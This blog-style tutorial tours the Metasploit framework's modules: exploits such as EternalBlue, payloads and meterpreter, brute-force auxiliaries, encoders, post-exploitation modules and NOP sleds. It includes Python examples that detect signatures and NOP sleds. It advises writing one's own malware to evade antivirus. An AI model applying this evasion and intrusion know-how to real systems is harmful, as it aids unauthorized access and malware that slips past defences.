I just wanted to show you some of the different SSH auxiliary modules that you can use. We saw how to scan for the SSH version, and we saw how to brute force SSH. You can try both on Metasploitable and on the OWASP machine. I'm not sure whether this password list contains the username and password for those machines, so I added them to the list to show you how it works.

So now you can use any password list you want and hope that it brute forces the SSH login. That would be it for this tutorial. In the next one, we will cover another auxiliary module that we will use against another service running on our OWASP virtual machine. I hope I see you in the next one.

Happy Hacking..

Sunday, July 12, 2020

Complete Metasploit Guide (Part-2 Understanding all Modules)

In this article, we are going to look at all the types of modules in the Metasploit framework, with an explanation of each in detail.
Let us take a closer look at the structure of the Metasploit framework itself. The first thing you want to know is where all the modules, encoders, payloads and exploits are actually stored. They live under

 /usr/share/metasploit-framework

Just cd into /usr/share and then into the metasploit-framework directory. Once you have changed directory there, type ls and you will see a bunch of these files


Metasploit framework module


and I will show you which are the more important ones and the ones that we will use.

Now, let's see, first of all. The first one is
msfconsole
It is the program that runs the console itself, where we actually perform the attacks.
Another important one is msfvenom.
This is the program we will use to create our payloads, our meterpreter shells and back doors, from the command line.
You can also update your Metasploit framework with the msfupdate command.
Most of the others are not so important at the moment. It is good to know that the Metasploit framework and all of the exploits are written in Ruby, which is a programming language similar to Python, so if you know that language it is a plus.

Now, to find all of the exploits and payloads you need to go into the modules directory. Everything is stored in there.

Metasploit framework  modules


So if you go into modules and type ls, you will see all of the things we want to understand.
We have auxiliary, encoders, evasion, exploits, nops, payloads and post.
Now let us explain each of those in detail.

Exploits

Exploits are used to target vulnerable software running on a remote machine. They are what let us take advantage of a vulnerable system to gain access to it.

So let's change our directory to exploits (cd exploits) and type ls. You will notice that there are different exploits for different operating systems and different platforms such as browsers.


For example you have Linux, Windows, Unix, Solaris, Android and Apple exploits, and also browser exploits, as we see with Firefox. There are a bunch of separate directories for the different types of exploits.

Metasploit framework  exploits


So let's try to find the exploit I talked about in the previous article, the one for the Windows 7 and Windows 8 machine: I believe it is the Eternal Blue exploit from 2017. It is a Windows exploit, so we go into windows and type ls. There is a further division among these exploits, as we can see in the image above. Most of them are divided by the port number or by the service that runs on a certain port.

For example, we can see http, which runs on port 80; ssh on port 22; ftp on port 21; and smb on port 445, I believe. So let us go into smb, since that is where the Eternal Blue exploit is. If I type ls here, you will see a bunch of different exploits for SMB. And here it is, the eternalblue_win8.py exploit. We also have the regular Eternal Blue exploit.


Metasploit framework  exploits smb


Most of these end in .rb, which means they are Ruby files; the exploits are written in Ruby, as I said before.

If you wanted to, you could open some of them in nano to see what they look like. So let's see what Eternal Blue looks like: open its .rb file and we can see the code of the exploit itself, written in Ruby, as I said. You can look through a bunch of these things here.


Metasploit framework  exploits smb code


Now I do not know Ruby, so I will not explain what all of this does. It is similar to Python, and you can understand it if you have learned some programming language before. For now, I just wanted to show you the code behind this exploit.

So let's close this and go back to the modules directory (cd back into modules), and let's talk about payloads.

 Payloads

Payloads are the code that gives us access to or control of a system. In short, a payload is what an attacker runs on the system it is injected into in order to own it; rootkits are one example.

So for the payload directory, first change directory to payloads and type ls to see what we have. Here we have different types of payloads.

As I said before, those are the files that we send to the victim, for example back doors. As we can see there are three types here: singles, stagers, and stages.

Metasploit framework  payloads


Singles are smaller, self-contained payloads that perform only one action.
For example, a single keylogging payload.

Stagers are used to deliver another payload; they set up the communication between attacker and target.

Stages are the larger payloads delivered by a stager, and they give almost full control of the target.
For example, the shell that we will use in most of our attacks, the meterpreter shell, is a stage.

Now, what is a meterpreter shell?
It is basically a shell with a bunch of different options that we can use after we exploit the remote system. We can screenshot the desktop, run a keylogger, bypass antivirus, and do a bunch of other things with the meterpreter shell. We can upload other payloads with meterpreter, download and upload files, and more that we will cover in the next tutorials. That's about it for payloads.


Let us check what else we have. Next is auxiliary.

Auxiliary 

Auxiliary modules are a collection of different functionalities that are widely used while hacking. They provide a variety of functions for enumerating, scanning and brute forcing a target.

Metasploit framework  auxiliary


So let us go into the auxiliary modules and type ls, and you will see that they are also divided into different types.
We have fuzzers, spoofers, sniffers and other types of auxiliary modules. Most likely, though, the auxiliary modules you will use are scanners that you run against a target.

So for example you can scan whether your target is vulnerable to some type of attack. Auxiliary modules are also used for brute forcing, for example SSH, Tomcat, and other services that we will cover in the next article.

You can check out all of the other subdirectories, if you want to, and see what they contain. Some of the auxiliary modules are written in Ruby as well.
That's about it for auxiliary.

 
Now let's talk about the encoders. 

Encoders

As the name suggests, encoders are used to encode exploits and payloads so that they can get past security software.

If I type ls here you will see the encoders. Let's go into that directory.


Metasploit framework  encoders


These are the encoders for different types of machines. Encoders are mostly used to bypass antiviruses. With an encoder you change how the code looks, or scramble it, so that the antivirus database does not recognize it.

Now, how do antivirus databases work, or basically how does most antivirus software work? They keep a huge database of all of the known exploits, viruses, Trojans and malware. Once you run a program on your PC that is malware and is known to that database, your antivirus will prevent it from running and delete it.
But if you change the code a little bit and scramble it, or better still write the malware yourself, most antivirus products will most likely not detect it, since it is the first time they see code like that. That code is not in their database, so they cannot detect it, and they run it as a normal program rather than as malware.
That's why coding your own malware is a big advantage. That would be about it for the encoders; we will also show how to use them later on.
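To make the database argument above concrete, here is an added example (my own illustration, not code from Metasploit or from any antivirus product) that models three layers a scanner can apply: an exact file hash, a byte pattern of the kind YARA rules carry, and a high-entropy heuristic for content that looks encoded or packed. The "known" sample and the encoded stand-in are constructed byte strings, not real payloads, and the 7.0 bits-per-byte threshold is a constructed value.

```python
import hashlib
import math
import random
from collections import Counter

# Constructed stand-in for a payload the AV vendor already knows: a fake
# PE-style header, zero padding and a harmless command string. Not malware.
KNOWN_SAMPLE = b"MZ\x90\x00" + b"\x00" * 60 + b"cmd.exe /c echo constructed-sample" + b"\x00" * 20

# Two ways a signature database can record that sample.
HASH_DB = {hashlib.sha256(KNOWN_SAMPLE).hexdigest()}   # whole-file hash
PATTERN_DB = {"constructed-rule": b"cmd.exe /c echo"}  # byte pattern, YARA-style

# Constructed stand-in for an encoded/scrambled payload: seeded pseudo-random
# bytes, which look like encrypted or compressed data to a scanner.
_rng = random.Random(1)
ENCODED_STANDIN = bytes(_rng.getrandbits(8) for _ in range(4096))


def matches_hash(data: bytes) -> bool:
    """Exact match: any change to the file, however small, defeats this check."""
    return hashlib.sha256(data).hexdigest() in HASH_DB


def matching_patterns(data: bytes) -> list:
    """Byte-pattern match: survives edits outside the bytes the rule covers."""
    return [name for name, pattern in PATTERN_DB.items() if pattern in data]


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for one repeated value, up to 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def classify(data: bytes, entropy_threshold: float = 7.0) -> str:
    """Layered verdict, in the order a simple scanner would apply the checks."""
    if matches_hash(data):
        return "known-hash"
    if matching_patterns(data):
        return "known-pattern"
    if shannon_entropy(data) > entropy_threshold:
        return "suspicious-high-entropy"
    return "clean"


def tweak_one_byte(data: bytes, index: int) -> bytes:
    """Flip one byte: the whole-file hash changes although the content barely does."""
    out = bytearray(data)
    out[index] ^= 0xFF
    return bytes(out)


if __name__ == "__main__":
    print("original          :", classify(KNOWN_SAMPLE))
    print("one byte changed  :", classify(tweak_one_byte(KNOWN_SAMPLE, 10)))
    print("encoded stand-in  :", classify(ENCODED_STANDIN), round(shannon_entropy(ENCODED_STANDIN), 2))
    print("plain text        :", classify(b"plain text, nothing to see here"))
```

The point for defenders: a one-byte change defeats the hash, the byte pattern still holds as long as the bytes it covers survive, and an encoded payload defeats both, which is why products add entropy, heuristic and behavioural checks on top of signatures, and why an alert on "unknown high-entropy executable" is worth keeping even though it has more false positives than a hash hit.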

 Post

The post directory holds tools and programs that you use after you have exploited the target, which is normally called post-exploitation.

Metasploit framework  posts


In post you will find capture, escalating privileges, gathering information, manage, recon and WLAN.
For example, you send meterpreter, which is the reverse shell we will use. From meterpreter you can upload other post-exploitation programs and use them together: password gathering, or basically any other information gathering you want, such as collecting cookies from a certain browser.

 Nops

It is short for no operation. It is an instruction in assembly language that performs no operation: a nop makes the processor do nothing for an entire clock cycle.
This is very useful in buffer overflow attacks.


Metasploit framework  nops

   
Basically, if you have ever encountered assembly code, or if you are an assembly programmer, you will most likely know what nops are.

Now, this is most popularly known on x86 chips as the byte 0x90. That single byte is the instruction. When a processor loads it, it simply does nothing for one cycle and then advances the instruction pointer to the next instruction, so execution just passes through until it reaches the next useful instruction.

Now, why are these nops useful?

The nops keep the payload size consistent. The practical importance of this has to do with writing instruction jumps. If you do not know what instruction jumps are, it doesn't matter that much, but jumps can be either relative or absolute. If you move data around at all, you must recode an absolute jump to it, and if you move one instruction relative to another, you must also recode the relative jump. Putting in nops simplifies the problem because a jump that lands anywhere in a series of nops will continue on to the first executable instruction, which prevents the processor from reading invalid code that could stop execution and crash the software.

So from all of this you just need to remember that nop is an instruction, written as the byte 0x90, that does nothing. That's what you need to know.
We will probably use it later on in some other section.
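Two things a practitioner might want to see worked through here: how an IDS spots a NOP sled in traffic or in a captured buffer, and why a jump landing anywhere in the sled reaches the same first real instruction. This Python block is an added illustration, not from the tutorial or from Metasploit. SAMPLE_BUFFER is a constructed byte string (a three-byte x86 prologue, a 64-byte sled, and a single 0xCC breakpoint opcode standing in for the first real instruction), and the 32-byte minimum run length is a constructed threshold.

```python
NOP = 0x90  # x86 one-byte "no operation" opcode

# Constructed buffer, not a real capture: push ebp / mov ebp,esp (0x55 0x89 0xE5)
# standing in for earlier code, a 64-byte sled, one 0xCC (int3) standing in
# for the first real instruction, and some zero padding.
SAMPLE_BUFFER = b"\x55\x89\xe5" + bytes([NOP]) * 64 + b"\xcc" + b"\x00" * 16


def find_nop_sleds(data: bytes, min_len: int = 32):
    """Return (offset, length) for every run of 0x90 at least min_len bytes long.

    Short runs are ignored on purpose: compilers pad between functions with a
    few 0x90 bytes, so only a long run is worth an alert."""
    sleds = []
    i, n = 0, len(data)
    while i < n:
        if data[i] != NOP:
            i += 1
            continue
        j = i
        while j < n and data[j] == NOP:  # extend to the end of this run
            j += 1
        if j - i >= min_len:
            sleds.append((i, j - i))
        i = j
    return sleds


def landing_target(data: bytes, land_at: int):
    """Model the CPU sliding through NOPs: wherever control lands inside the
    sled, execution reaches the first non-NOP byte. Returns that byte's offset,
    or None if the buffer ends before any real instruction is reached."""
    i = land_at
    while i < len(data) and data[i] == NOP:
        i += 1
    return i if i < len(data) else None


if __name__ == "__main__":
    print("sleds:", find_nop_sleds(SAMPLE_BUFFER))
    # every landing point inside the sled ends at the same instruction
    print("landing targets:", {landing_target(SAMPLE_BUFFER, k) for k in range(3, 67)})
```

The detector only looks for the plain 0x90 form, which is what the classic Snort shellcode rules match on as well; the landing_target function is the whole reason the sled exists, since an exploit author who can only guess the return address roughly still ends up at the same instruction.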

Those are all the modules of the Metasploit framework.
This should be enough for you to understand the basic structure of the Metasploit framework. In the next article, we will actually start covering some of these scanners and exploits that we can use on our vulnerable targets. So that would be it for this tutorial and I hope I see you in the next one.
